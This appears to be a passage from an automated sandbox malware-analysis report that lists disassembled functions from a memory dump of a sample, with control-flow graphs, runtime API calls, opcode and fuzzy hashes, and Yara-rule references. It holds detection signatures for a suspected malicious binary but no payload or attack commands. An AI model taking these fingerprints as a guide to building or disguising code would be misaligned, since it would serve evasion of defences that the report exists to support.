                                                                                                                                        control_flow_graph 595 5de3f16-5de3f2f 596 5de3f49-5de3f5e call 5debdc0 595->596 597 5de3f31-5de3f3b call 5de5ba8 call 5de4c72 595->597 596->597 602 5de3f60-5de3f63 596->602 606 5de3f40 597->606 604 5de3f77-5de3f7d 602->604 605 5de3f65 602->605 610 5de3f7f 604->610 611 5de3f89-5de3f9a call 5df0504 call 5df01a3 604->611 608 5de3f6b-5de3f75 call 5de5ba8 605->608 609 5de3f67-5de3f69 605->609 607 5de3f42-5de3f48 606->607 608->606 609->604 609->608 610->608 613 5de3f81-5de3f87 610->613 619 5de4185-5de418f call 5de4c9d 611->619 620 5de3fa0-5de3fac call 5df01cd 611->620 613->608 613->611 620->619 625 5de3fb2-5de3fbe call 5df01f7 620->625 625->619 628 5de3fc4-5de3fcb 625->628 629 5de3fcd 628->629 630 5de403b-5de4046 call 5df02d9 628->630 632 5de3fcf-5de3fd5 629->632 633 5de3fd7-5de3ff3 call 5df02d9 629->633 630->607 636 5de404c-5de404f 630->636 632->630 632->633 633->607 640 5de3ff9-5de3ffc 633->640 638 5de407e-5de408b 636->638 639 5de4051-5de405a call 5df0554 636->639 642 5de408d-5de409c call 5df0f40 638->642 639->638 650 5de405c-5de407c 639->650 643 5de413e-5de4140 640->643 644 5de4002-5de400b call 5df0554 640->644 651 5de409e-5de40a6 642->651 652 5de40a9-5de40d0 call 5df0e90 call 5df0f40 642->652 643->607 644->643 653 5de4011-5de4029 call 5df02d9 644->653 650->642 651->652 661 5de40de-5de4105 call 5df0e90 call 5df0f40 652->661 662 5de40d2-5de40db 652->662 653->607 658 5de402f-5de4036 653->658 658->643 667 5de4107-5de4110 661->667 668 5de4113-5de4122 call 5df0e90 661->668 662->661 667->668 671 5de414f-5de4168 668->671 672 5de4124 668->672 675 5de416a-5de4183 671->675 676 5de413b 671->676 673 5de412a-5de4138 672->673 674 5de4126-5de4128 672->674 673->676 674->673 677 5de4145-5de4147 674->677 675->643 676->643 677->643 678 5de4149 677->678 678->671 679 5de414b-5de414d 678->679 679->643 679->671
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 05DE3F51
                                                                                                                                          • Part of subcall function 05DE5BA8: __getptd_noexit.LIBCMT ref: 05DE5BA8
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 05DE3FEA
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 05DE4020
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 05DE403D
                                                                                                                                        • __allrem.LIBCMT ref: 05DE4093
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DE40AF
                                                                                                                                        • __allrem.LIBCMT ref: 05DE40C6
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DE40E4
                                                                                                                                        • __allrem.LIBCMT ref: 05DE40FB
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DE4119
                                                                                                                                        • __invoke_watson.LIBCMT ref: 05DE418A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                        • Instruction ID: b04fcf5af32421701f9772e4de7f60623d850666e609dade687bf5250028258a
                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                        • Instruction Fuzzy Hash: 2A71E271B01B16ABEB15BE68CC44B6AB3B9FF10364F15423BE915D7281E770E9408BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3432600739-0
                                                                                                                                        • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                        • Instruction ID: 153f9d5489c8ba9256bfda01af508184b768168be6b6dad01873bde442b432b6
                                                                                                                                        • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                        • Instruction Fuzzy Hash: 6D411F32A04304AFDB00BFA4EC88B9E3BA5FF15714F10846FE91896291DB76D645DB71
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE84AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 744 5de84ab-5de84d9 call 5de8477 749 5de84db-5de84de 744->749 750 5de84f3-5de850b call 5de158d 744->750 752 5de84ed 749->752 753 5de84e0-5de84eb call 5de158d 749->753 757 5de850d-5de850f 750->757 758 5de8524-5de855a call 5de158d * 3 750->758 752->750 753->749 753->752 759 5de851e 757->759 760 5de8511-5de851c call 5de158d 757->760 769 5de855c-5de8562 758->769 770 5de856b-5de857e 758->770 759->758 760->757 760->759 769->770 771 5de8564-5de856a call 5de158d 769->771 775 5de858d-5de8594 770->775 776 5de8580-5de8587 call 5de158d 770->776 771->770 778 5de8596-5de859d call 5de158d 775->778 779 5de85a3-5de85ae 775->779 776->775 778->779 780 5de85cb-5de85cd 779->780 781 5de85b0-5de85bc 779->781 781->780 784 5de85be-5de85c5 call 5de158d 781->784 784->780
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ExitProcess___crt
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1022109855-0
                                                                                                                                        • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                        • Instruction ID: 00e8e5b38ff77a06f627c9d4c59a8d5209c7ee5ab9dc9b65ce5e5b7f82a0316b
                                                                                                                                        • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                        • Instruction Fuzzy Hash: 6F31A031A00750DBCB21BF54FC8885977B4FB15320794863BE906572B0CBB499CAFEA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E0FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E0FC1F
                                                                                                                                          • Part of subcall function 05DF169C: std::exception::_Copy_str.LIBCMT ref: 05DF16B5
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E0FC34
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E0FC4D
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E0FC62
                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 05E0FC74
                                                                                                                                          • Part of subcall function 05E0F914: std::exception::exception.LIBCMT ref: 05E0F92E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E0FC82
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E0FC9B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E0FCB0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                                                        • String ID: leM
                                                                                                                                        • API String ID: 3569886845-2926266777
                                                                                                                                        • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                        • Instruction ID: 340d76d56e0430fe95a1a44f32e839178e4b54e85893684ae4721c33a5f0d0c9
                                                                                                                                        • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                        • Instruction Fuzzy Hash: F411DA79D0020DBBCF00FFE5D459CDDBB7CEA04244F818567A91497240EB74A748CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free_malloc_wprintf$_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3721157643-0
                                                                                                                                        • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                        • Instruction ID: 0bb683ccc60e1be5de21109ce927cb07d5e860d8d568bc5b57186cd41dd0a0c1
                                                                                                                                        • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                        • Instruction Fuzzy Hash: EC11D5B67006556AC26177F55C15EFF7AECDF46701F0400ABFA88E1180DA585A0593B2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DD1960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 65388428-0
                                                                                                                                        • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                        • Instruction ID: f7fb4e3ca1486c22d4373675a610c9b80a44afb54a09d13ff31d1267aff3472e
                                                                                                                                        • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                        • Instruction Fuzzy Hash: EC513C71E40219BADB11DBE5DD49FAEBBB8FB04744F100026FA05B6180E7746A05CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 217217746-0
                                                                                                                                        • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                        • Instruction ID: bd37adbf241d5a0281696e3364cf9db21ec83bd1bf0f117ca88111d18ff35f98
                                                                                                                                        • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                        • Instruction Fuzzy Hash: 91513FB1E4020ABADF11DFE1DD46FEEBB79FB04704F10412AF905B7180D675AA058BA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 217217746-0
                                                                                                                                        • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                        • Instruction ID: 5768ba0d96def0508a711bb40caf37d51d124dcbb7f74c1888f15965d690828b
                                                                                                                                        • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                        • Instruction Fuzzy Hash: ED513171E4020AAADF11DFA5DD85FFEBBB9FB04704F10012AFA05B7180D674A9058BA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E0208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3534693527-0
                                                                                                                                        • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                        • Instruction ID: 384f979e5abee442af12261999d4ed082b1c716dd5a4594818a64cacc187df17
                                                                                                                                        • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                        • Instruction Fuzzy Hash: 2A31F436B04321AAEB217F64DC0CBAF77D5EF05B68F106016EB55EB2C0DB74898082B1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E866D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __getptd_noexit.LIBCMT ref: 05E866DD
                                                                                                                                          • Part of subcall function 05DE59BF: __calloc_crt.LIBCMT ref: 05DE59E2
                                                                                                                                          • Part of subcall function 05DE59BF: __initptd.LIBCMT ref: 05DE5A04
                                                                                                                                        • __calloc_crt.LIBCMT ref: 05E86700
                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 05E8671E
                                                                                                                                        • __invoke_watson.LIBCMT ref: 05E8673B
                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 05E8676D
                                                                                                                                        • __invoke_watson.LIBCMT ref: 05E8678B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4066021419-0
                                                                                                                                        • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                        • Instruction ID: a8878543a0c0b2c7ed6de8b826dc7d74c6b7dc674546be1d5ad9c84fbbb8ab5c
                                                                                                                                        • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                        • Instruction Fuzzy Hash: DA11C132701A146BFB227B659C08FBA739DEF106A8F401427FE8CEB240E722DD0042E4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DD2670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: D
                                                                                                                                        • API String ID: 2102423945-2746444292
                                                                                                                                        • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                        • Instruction ID: 9b7977aee8fd066aed81f1bb920a2e593fb716867289f5db97fd9552d95e860d
                                                                                                                                        • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                        • Instruction Fuzzy Hash: 60E15D75D40219EBDF24DBA0CD89FEEB7B8BF04304F14416AE50AE6190EB74AA45CF64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCD8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: $$$(
                                                                                                                                        • API String ID: 2102423945-3551151888
                                                                                                                                        • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                        • Instruction ID: 97fa9954107f714000df1298ecfb336c8b285c51fcfb25222eec168a026c2d3f
                                                                                                                                        • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                        • Instruction Fuzzy Hash: 0E91A071D00259EAEF20DFA4CC49BEEBBB6EF05304F1441AAD40577280DBB65A48CB65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE5CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                        • String ID: U
                                                                                                                                        • API String ID: 3628947076-3372436214
                                                                                                                                        • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                        • Instruction ID: 4f3798b31dd3e7bc4d813b96f75c7e57144f772f24306d5089a202fc538f1342
                                                                                                                                        • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                        • Instruction Fuzzy Hash: 2321EB327182087AEB00FBA4FC49FBE73ADEB45694F504167F909D7190FA71E94087A4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DDA810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: p2Q
                                                                                                                                        • API String ID: 2102423945-1521255505
                                                                                                                                        • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                        • Instruction ID: acd8e60bf72c624012580e940c3d6534ea6c1c6934300c3bf4b2c87c2c3c2833
                                                                                                                                        • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                        • Instruction Fuzzy Hash: D5F0ED78698755A5F7217750BC2AB957E91BB31B08F104089E1182E3E1D3FD338CA7AA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E0FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E0FBF1
                                                                                                                                          • Part of subcall function 05DF169C: std::exception::_Copy_str.LIBCMT ref: 05DF16B5
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E0FC06
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                                                        • String ID: TeM$TeM
                                                                                                                                        • API String ID: 3662862379-3870166017
                                                                                                                                        • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                        • Instruction ID: a6d0de6a5be45e597dbbc81d8fec3d167a0238a2c617e1ed32851b7f881f0fea
                                                                                                                                        • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                        • Instruction Fuzzy Hash: ECD06775D0020CBBCB00EFA5D459CDDBBB8EA04344F418467AA1497241EA74A749CB95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCD0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 05DE197D: __wfsopen.LIBCMT ref: 05DE1988
                                                                                                                                        • _fgetws.LIBCMT ref: 05DCD15C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wfsopen_fgetws
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 853134316-0
                                                                                                                                        • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                        • Instruction ID: 84d21c0c9482db9499a40d3e9a35a3a536bf133da35af49d7f84ee5d2a0c1416
                                                                                                                                        • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                        • Instruction Fuzzy Hash: 0D918271D0025AABCF21EF94CC45BAEBBB6BF04204F14057FD856A3240E775AA14CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCD540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1783060780-0
                                                                                                                                        • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                        • Instruction ID: 1decb773c86db3a772ab2b3783eb48fdfd2a11afe8f7621817047524433256f8
                                                                                                                                        • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                        • Instruction Fuzzy Hash: FCA16CB1D00289EBEF11EFA4CC49BEEBF75AF14304F140069E50577291D7B65A88CBA6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE2AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                        • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                        • Instruction ID: ad6b9e0a3aee1408143818bb75ac709b0b89db2b7970f258be3284bca59c00a6
                                                                                                                                        • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                        • Instruction Fuzzy Hash: 05519238B043099BDB29EF69CC84A6E77BABF40321F14872BE876D62D4D771D9508B50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E01359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
